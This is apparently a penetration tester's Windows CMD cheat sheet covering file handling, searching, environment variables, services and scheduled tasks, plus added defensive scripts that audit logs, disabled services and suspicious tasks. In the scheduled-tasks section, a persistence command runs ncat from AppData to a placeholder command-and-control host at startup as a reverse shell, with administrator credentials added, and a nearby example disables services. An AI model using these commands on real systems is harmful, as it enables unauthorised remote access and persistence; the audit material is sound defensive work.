Pentest Journeys
CMD

Basics

Located at C:\Windows\System32\cmd.exe.

General

| Key/Command | Description |
|---|---|
| cls | Clears the screen. |
| doskey /history | Prints the session's command history. |
| Page Up | Places the first command in our session history at the prompt. |
| Page Down | Places the last command in history at the prompt. |
| ⇧ | View previously run commands. |
| ⇩ | View the most recently run commands. |
| ⇨ | Types the previous command to the prompt one character at a time. |
| ⇦ | N/A |
| F3 | Retypes the entire previous entry to our prompt. |
| F5 | Pressing F5 multiple times cycles through previous commands. |
| F7 | Opens an interactive list of previous commands. |
| F9 | Enters a command at our prompt based on the number specified. The number corresponds to the command's place in our history. |

Navigation

# list directory
dir
# list hidden files
dir /a:h
# current working directory
cd
chdir
# move to another directory
cd <PATH>
chdir <PATH>
# print the structure of current directory & subdirs
tree
# directories & files
tree /F

Directories

# create new dir
mkdir <name>
md <name>
# delete empty dir
rmdir <name>
rd <name>
# delete non-empty dir
rmdir /S <name>
rd /S <name>
# move dir
move <source> <dest>

Files

# view contents
type <filename>
# view contents of all matching files at once
type *.txt
# read all files from all subdirectories into one file
for /r %i in (*) do type "%i" >> all_files_content.txt
# view contents one screen at a time, squeezing extra blank lines
more <filename> /S
# pipe large-output commands
systeminfo | more
# create a file (fsutil creates a file of the given size in bytes, here 222)
echo <text> > <filename>
fsutil file createNew <filename> 222
# rename a file
ren <filename> <newfilename>
rename <filename> <newfilename>
# delete a file
del <filename>
erase <filename>
# delete files by attribute (here /A:R = read-only)
del /A:R *
# copy a file (with verification)
copy <source> <dest> /V
# move a file
move <source> <dest>

Copy

xcopy has been deprecated in favour of robocopy (robust file copy). The former resets file attributes by default, which can be useful from an attacker's perspective. The latter combines copy, xcopy, and move, and is made for large directories and drive syncing.

# copy dir
xcopy <source> <dest> <options>
# recursive (+empty dirs)
xcopy <source> <dest> /E 
# retain attributes
xcopy <source> <dest> /K
# basic robocopy usage
robocopy <source> <dest>

Operations

Searching

# Search the dirs defined in PATH
where cmd.exe
# Recursive search under a directory
where /R c:\users\ text.txt
# Search for a literal string within a file or output (no wildcards/regex)
find "string" file.txt
# Lines that do NOT match
find /V "string" file.txt
# Case-insensitive
find /I "string" file.txt
# Display line numbers
find /N "string" file.txt
# findstr: the upgrade from find, similar to grep (accepts regex)
findstr "name" test.txt
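The following batch script is an added example (not part of the original cheat sheet) that exercises the find and findstr switches listed above against a small, constructed logon log written to %TEMP%. The log lines, the user names and the addresses are made up; the point is to see where find (literal match) stops and findstr (regex) is needed, which is the usual situation when triaging a log on a host with nothing but cmd.exe.

```batch
@echo off
REM Added example, not from the original page: find vs. findstr on a constructed log.
setlocal
set "log=%TEMP%\sample_auth.log"

rem Constructed sample data: three failed logons for bob from one source address.
> "%log%" (
    echo 2024-05-01 09:12:01 LOGON   user=alice  src=10.0.0.5   result=success
    echo 2024-05-01 09:12:07 LOGON   user=bob    src=10.0.0.9   result=FAILED
    echo 2024-05-01 09:12:09 LOGON   user=bob    src=10.0.0.9   result=FAILED
    echo 2024-05-01 09:12:11 LOGON   user=bob    src=10.0.0.9   result=FAILED
    echo 2024-05-01 09:15:44 LOGOFF  user=alice  src=10.0.0.5
)

echo == find: literal match, case-insensitive, with line numbers ==
find /I /N "failed" "%log%"

echo.
echo == find /C /V: count the lines that do NOT contain FAILED ==
find /C /V "FAILED" "%log%"

echo.
echo == findstr /R: failed logons from 10.0.0.x only (regex, so \. is a literal dot) ==
findstr /I /R /C:"src=10\.0\.0\.[0-9]* .*result=FAILED" "%log%"

echo.
echo == findstr /S /M: which .log files under %TEMP% contain the string at all ==
findstr /S /M /I /C:"result=FAILED" "%TEMP%\*.log"

del "%log%"
endlocal
```

The /C: switch keeps a pattern containing spaces as one search string; without it findstr would treat each space-separated word as a separate pattern and match far more than intended.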

Sorting

# Sort file and write to output
sort text.txt /O sorted.txt
# Reverse sort
sort text.txt /r
# Remove dupes
sort text.txt /unique

Comparing

# compare two files (byte output)
comp test.txt test2.txt
# ASCII output with line numbers
comp test.txt test2.txt /A /L
# fc shows the whole differing line instead of just the differing bytes (comp)
fc test.txt test2.txt /N

Environment Variables

Environment variables are global, case-insensitive, and referenced as %ENV_VAR%. There are two major scopes:

  1. System -> OS-defined, globally-accessible

  2. User -> user-defined, user-accessible

Managing Env Vars

set -> temporary, i.e., the current session only; setx -> permanent, i.e., written to the registry (note that setx does not update the session it is run from, only new ones).

# Displaying all env vars
set
# Displaying a var's value (set <NAME> lists every var whose name starts with NAME)
set PATH
echo %PATH%
# Setting a session-local var
set LOCAL_VAR=test
# Creating
set DCIP=172.16.10.10
setx DCIP 172.16.10.10
# Clearing the persistent value (setx leaves an empty value behind rather than removing it)
setx DCIP ""

Interesting Env Vars

| Variable Name | Description |
|---|---|
| %PATH% | Specifies the set of directories where executable programs are located. |
| %OS% | The current operating system on the user's workstation. |
| %SYSTEMROOT% | Expands to C:\Windows. A system-defined, read-only variable containing the Windows system folder. Anything Windows considers important to its core functionality is found here, including important data, core system binaries, and configuration files. |
| %LOGONSERVER% | Provides us with the logon server for the currently active user, given as a machine hostname. We can use this information to tell whether a machine is joined to a domain or a workgroup. |
| %USERPROFILE% | Provides us with the location of the currently active user's home directory. Expands to C:\Users\{username}. |
| %ProgramFiles% | Equivalent of C:\Program Files. This location is where programs are installed on an x64-based system. |
| %ProgramFiles(x86)% | Equivalent of C:\Program Files (x86). This location is where 32-bit programs running under WOW64 are installed. This variable only exists on a 64-bit host, so it can be used to tell what kind of host we are interacting with (x86 vs. x64 architecture). |

Services

  • Note that not all services will respond to a stop request, regardless of our permissions, if other running programs/services depend on them.

  • When modifying a service, the changes will come into effect after the service is restarted. All changes made are reflected in the Windows registry and will persist on reboot, so services can be taken out permanently.

# Query running services
sc query type= service
tasklist /svc
net start
wmic service list brief # deprecated
# Starting/stopping a svc
sc <start | stop> <service>
net <start | stop | pause | continue> <service>
# Querying Windows Defender
sc query windefend
# Modifying start type (service won't be able to start with 'sc start <service>')
sc config <service> start= disabled
# Reverting the change
sc config <service> start= auto
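The note above says a start type change persists in the registry, so a service disabled this way stays off across reboots. The added script below (not from the original page) is the matching check from the defender's side: it walks every installed service with the same sc sub-commands and lists those whose START_TYPE is DISABLED, which is where a tampered security service such as windefend would show up. It assumes the English field labels of sc output ("SERVICE_NAME:", "START_TYPE") and uses a subroutine instead of delayed expansion so that pipes inside the loop behave.

```batch
@echo off
REM Added audit example, not from the original page: list services whose start type is DISABLED.
setlocal
set /a disabled=0

rem "sc query type= service state= all" prints one "SERVICE_NAME: <name>" line per
rem service; tokens=1,* splits on the first colon, %%B keeps a leading space.
for /f "tokens=1,* delims=:" %%A in ('sc query type= service state= all ^| findstr /B /C:"SERVICE_NAME:"') do (
    rem the inner loop with tokens=* trims the leading space from the name
    for /f "tokens=*" %%S in ("%%B") do call :check "%%S"
)

echo.
echo %disabled% disabled service(s) found.
endlocal
exit /b 0

:check
rem "sc qc" prints the service configuration; the START_TYPE line reads e.g.
rem "START_TYPE : 4 DISABLED". Services we cannot query are skipped silently.
sc qc "%~1" 2>nul | findstr /R /C:"START_TYPE.*DISABLED" >nul
if not errorlevel 1 (
    echo DISABLED: %~1
    set /a disabled+=1
)
exit /b 0
```

Running it as a low-privileged user still works for most services, because querying configuration needs far less than changing it; compare the list against a known-good baseline of the same build to spot anything that should not be there.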

Scheduled Tasks

# Viewing all scheduled tasks
schtasks /Query /V /FO list
# Querying a specific task
schtasks /query /tn "My Task" /V /fo list

Create Syntax

| Parameter | Description |
|---|---|
| /sc | Sets the schedule type. It can be by the minute, hourly, weekly, and much more. Be sure to check the options parameters. |
| /tn | Sets the name for the task we are building. Each task must have a unique name. |
| /tr | Sets the trigger and task that should be run. This can be an executable, script, or batch file. |
| /s | Specifies the host to run on, much like in Query. |
| /u | Specifies the local user or domain user to utilize. |
| /p | Sets the password of the specified user. |
| /mo | Allows us to set a modifier to run within our set schedule, for example every 5 hours every other day. |
| /rl | Allows us to limit the privileges of the task. Options are LIMITED and HIGHEST; LIMITED is the default. |
| /z | Sets the task to be deleted after completion of its actions. |

For creating a new scheduled task we must specify, at a minimum, the following:

  • /create : to tell it what we are doing

  • /sc : we must set a schedule

  • /tn : we must set the name

  • /tr : we must give it an action to take

schtasks /create /sc ONSTART /tn "My Task" /tr "c:\users\<user>\appdata\local\ncat.exe <c2c-ip> <c2c-port>"

Change Syntax

| Parameter | Description |
|---|---|
| /tn | Designates the task to change. |
| /tr | Modifies the program or action that the task runs. |
| /ENABLE | Changes the state of the task to Enabled. |
| /DISABLE | Changes the state of the task to Disabled. |

# Adding credentials to our reverse shell task
schtasks /change /tn "My Task" /ru administrator /rp "P@ssw0rd"
# Running the task immediately
schtasks /run /tn "My Task"

Delete Syntax

| Parameter | Description |
|---|---|
| /tn | Identifies the task to delete. |
| /s | Specifies the name or IP address of the host to delete the task from. |
| /u | Specifies the user to run the deletion as. |
| /p | Specifies that user's password. |
| /f | Suppresses the confirmation prompt. |

# Deleting a task
schtasks /delete /tn "My Task" /f
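The create, change and delete sections above all revolve around /tn and /tr, and the create example runs an executable out of a user's AppData folder. The added script below (not part of the original page) is the audit counterpart: it reads every task with schtasks /query /v /fo csv and flags those whose "Task To Run" points into a user profile, temp or public directory, printing the task name and the account it runs as. The directory patterns are constructed for illustration; the column positions assume the standard English CSV header, which the script verifies from the header row. A comma inside an earlier quoted field (some Microsoft tasks have one in Author) shifts that row's columns, a known limitation of splitting CSV with for /f.

```batch
@echo off
REM Added audit example, not from the original page: flag scheduled tasks that run from user-writable paths.
setlocal
set "layout_ok="

rem Column 2 = TaskName, 9 = Task To Run, 15 = Run As User; %%~ strips the CSV quotes.
rem Values are handed to a subroutine via variables so no delayed expansion is needed.
for /f "tokens=2,9,15 delims=," %%T in ('schtasks /query /v /fo csv') do (
    set "taskname=%%~T"
    set "action=%%~U"
    set "runas=%%~V"
    call :check
)

if not defined layout_ok echo WARNING: unexpected column layout, results may be unreliable
endlocal
exit /b 0

:check
rem The header row doubles as a sanity check that the columns are where we expect.
if "%taskname%"=="TaskName" (
    if "%action%"=="Task To Run" if "%runas%"=="Run As User" set "layout_ok=1"
    exit /b 0
)
rem findstr /R: \\ is a literal backslash, .* matches anything in between.
rem Patterns are constructed examples of user-writable locations; extend as needed.
echo %action%| findstr /I /R /C:"\\users\\.*\\appdata\\" /C:"\\temp\\" /C:"\\users\\public\\" >nul
if not errorlevel 1 echo SUSPICIOUS  %taskname%  (runs as %runas%)  -^>  %action%
exit /b 0
```

Tasks flagged here are not automatically malicious (updaters and per-user tools often live in AppData), but the combination of a user-writable path with a privileged "Run As User" is exactly what the /change example above produces, so those rows deserve a second look.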

Help

# Listing available commands
help
# Getting cmd-specific help
help <command>
<command> /?

Last updated 1 year ago
